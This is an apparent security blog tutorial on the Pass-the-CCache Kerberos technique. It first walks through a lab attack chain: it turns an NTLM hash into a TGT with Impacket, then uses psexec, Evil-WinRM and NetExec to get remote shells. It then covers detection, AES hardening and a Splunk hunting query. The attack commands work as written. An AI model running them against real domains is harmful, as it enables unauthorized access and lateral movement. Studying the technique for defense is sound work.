Listen to this Post
Introduction:
The “Pass-the-CCache” technique is a sophisticated credential access and lateral movement method that allows attackers to authenticate to services across an Active Directory (AD) environment without needing a user’s plaintext password or their NTLM hash. This is achieved by exploiting the Kerberos authentication protocol, where an attacker steals or generates a valid Ticket-Granting Ticket (TGT) saved as a `.ccache` file, which acts as a bearer token. By leveraging tools like Impacket and Evil-WinRM, an adversary can use this ticket to gain unauthorized access to remote systems, moving laterally with a low detection footprint.
Learning Objectives:
- Understand the core principles of Kerberos authentication and how the `.ccache` ticket file can be weaponized.
- Execute a complete attack chain using Impacket to convert an NTLM hash into a reusable TGT and use it for lateral movement.
- Implement defensive measures, including event log monitoring and Kerberos hardening, to detect and mitigate this technique.
You Should Know:
- Exporting the Ticket: Converting a Hash into a Pass-The-Ticket
Before an attacker can move laterally, they must first obtain a reusable Kerberos ticket. This is done by converting a compromised NTLM hash (often obtained from a previous attack like a hash dump) into a TGT. The Impacket tool `getTGT.py` facilitates this by communicating directly with the Key Distribution Center (KDC).
Step-by-step guide explaining what this does and how to use it:
The attacker first configures their attacking machine (e.g., Kali Linux) by editing the `/etc/krb5.conf` file to define the Kerberos realm and the domain controller. The host file is also updated to resolve the domain controller’s hostname to its IP address.
Once the environment is prepared, the attacker executes the following command to request a TGT using a compromised NTLM hash, which is saved as a `.ccache` file. This effectively transforms a stolen hash into a ticket that can be used for authentication.
Configure krb5.conf with the target domain and KDC
sudo nano /etc/krb5.conf
Add the following:
[bash]
default_realm = IGNITE.LOCAL
[bash]
IGNITE.LOCAL = {
kdc = dc.ignite.local
}
[bash]
.ignite.local = IGNITE.LOCAL
ignite.local = IGNITE.LOCAL
Map the domain controller's IP
echo "192.168.1.11 dc.ignite.local" | sudo tee -a /etc/hosts
Request a TGT using an NTLM hash
impacket-getTGT -dc-ip 192.168.1.11 -hashes :32196b56ffe6f45e294117b91a83bf38 ignite.local/Administrator
The command will create a file named 'Administrator.ccache'
After the ticket is generated, the attacker sets the `KRB5CCNAME` environment variable to point to the `.ccache` file. This variable tells any Kerberos-aware tool to use this ticket for authentication, effectively loading the credentials into the current session.
export KRB5CCNAME=Administrator.ccache
2. Moving Laterally with Impacket and Evil-WinRM
With the Kerberos ticket loaded, the attacker can now move laterally to other machines on the network. Several tools can leverage this ticket for remote code execution. Impacket’s `psexec` is a common choice, as it uploads a service to the target’s `ADMIN$` share to gain a SYSTEM shell. The `-k` flag tells the tool to use Kerberos authentication, and `-no-pass` indicates that no password or hash will be provided.
Using Impacket PsExec for a SYSTEM shell impacket-psexec ignite.local/[email protected] -k -no-pass
Evil-WinRM is another powerful shell that supports Kerberos authentication directly using the `.ccache` file via the `-K` flag. This provides an interactive PowerShell session on the remote Windows machine.
Gaining a PowerShell session with Evil-WinRM using the ccache file evil-winrm -i dc.ignite.local -r IGNITE.LOCAL -K Administrator.ccache
Finally, the modern NetExec framework (successor to CrackMapExec) can also use the cached ticket with the `–use-kcache` flag. This allows the attacker to execute commands over SMB or WMI without ever providing a password or hash.
Using NetExec over SMB nxc smb 192.168.1.11 -u administrator --use-kcache -x whoami Using NetExec over WMI (alternative port) nxc wmi 192.168.1.11 -u administrator --use-kcache -x ipconfig
3. How to Detect Pass-the-CCache Activity
Defenders can identify this attack by monitoring for specific anomalies in Kerberos traffic and Windows event logs. A key indicator is an unusual Kerberos TGT request (AS-REQ) coming from a non-domain-joined machine. Additionally, security teams should look for the presence of the RC4 encryption type in Kerberos tickets, as its use is often a sign of an attacker leveraging an NTLM hash rather than a modern AES key.
4. How to Mitigate Pass-the-CCache Attacks
Mitigation focuses on restricting how Kerberos tickets can be used and protecting privileged credentials. A primary defense is to enforce AES-only Kerberos encryption for all domain accounts. This prevents attackers from using NTLM hashes (which rely on the weaker RC4 cipher) to request TGTs.
Other critical hardening steps include:
- Enable Credential Guard: On Windows 10 and Server 2016+, this protects the LSASS process, making it harder for attackers to dump NTLM hashes in the first place.
- Restrict Administrative Logons: Use jump servers or Privileged Access Workstations (PAWs) to limit where high-privilege accounts can authenticate from.
- Monitor for Service Creation: Track Windows Event ID 7045, which logs the creation of new services—a telltale sign of PsExec usage.
- Proactive Hardening: Restricting Kerberos Ticket Lifetimes and Encryption
For system administrators, proactive hardening of the Kerberos policy is the most effective long-term defense. This involves configuring the domain’s Group Policy to enforce stricter settings.
Step-by-step guide for hardening Kerberos:
- Open the Group Policy Management Console (GPMC) and edit the Default Domain Policy.
- Navigate to
Computer Configuration -> Policies -> Windows Settings -> Security Settings -> Account Policies -> Kerberos Policy. - Set “Enforce user logon restrictions” to Enabled to validate every ticket request against the user’s account restrictions.
- Configure “Maximum lifetime for user ticket” (TGT) to a lower value, such as 8-10 hours, to limit the window of opportunity for a stolen ticket.
- To enforce AES encryption, use a PowerShell script to identify and disable RC4 for all accounts. While a global policy is ideal, a script can help audit compliance.
PowerShell to find accounts still using RC4 (weak encryption)
Get-ADUser -Filter {Enabled -eq $true} -Properties msDS-SupportedEncryptionTypes |
Where-Object { $_.'msDS-SupportedEncryptionTypes' -notcontains 24 } |
Select-Object Name, UserPrincipalName
Accounts that do not have AES support enabled (type 24) are potentially vulnerable. A script can then be used to set the `msDS-SupportedEncryptionTypes` attribute to force AES.
- Blue Team: Hunting for Lateral Movement with Event Logs
A proactive Blue Team can hunt for this technique by correlating specific Windows Security Event IDs. The following Splunk query is designed to detect the use of NetExec, a common tool in these attacks, by looking for its command-line arguments.
index=windows sourcetype=WinEventLog:Security EventCode=4688 (Process_Name="nxc.exe" OR Command_Line=" smb " OR Command_Line=" wmi ") AND Command_Line=" -u " AND Command_Line=" --use-kcache " | table _time, Host, User, Process_Name, Command_Line | sort - _time
This search filters for process creation events where the executable is `nxc.exe` or where the command line contains SMB or WMI references alongside the `–use-kcache` flag. Detecting such an event in the environment is a strong indicator of malicious Kerberos ticket abuse.
What Undercode Say:
- The Pass-the-CCache technique demonstrates that a stolen NTLM hash is a critical first step; protecting credential storage (like LSASS) is paramount.
- A robust defense-in-depth strategy must include Kerberos hardening (enforcing AES, reducing ticket lifetimes) to limit the blast radius of any single compromised credential.
- Active detection using EDR and SIEM rules, focused on anomalous Kerberos requests and administrative tool usage, is essential to catch this type of attack during the lateral movement phase.
Prediction:
As more organizations transition to cloud and hybrid identities, Kerberos-based attacks like Pass-the-CCache will remain a critical threat. Attackers will continue to abuse legacy protocols (like RC4) in mixed-mode environments. The future of defense lies in aggressive deprecation of weak encryption ciphers and the implementation of real-time identity threat detection solutions that can correlate authentication attempts across both on-premises and cloud infrastructure.
▶️ Related Video (80% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Pass The – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
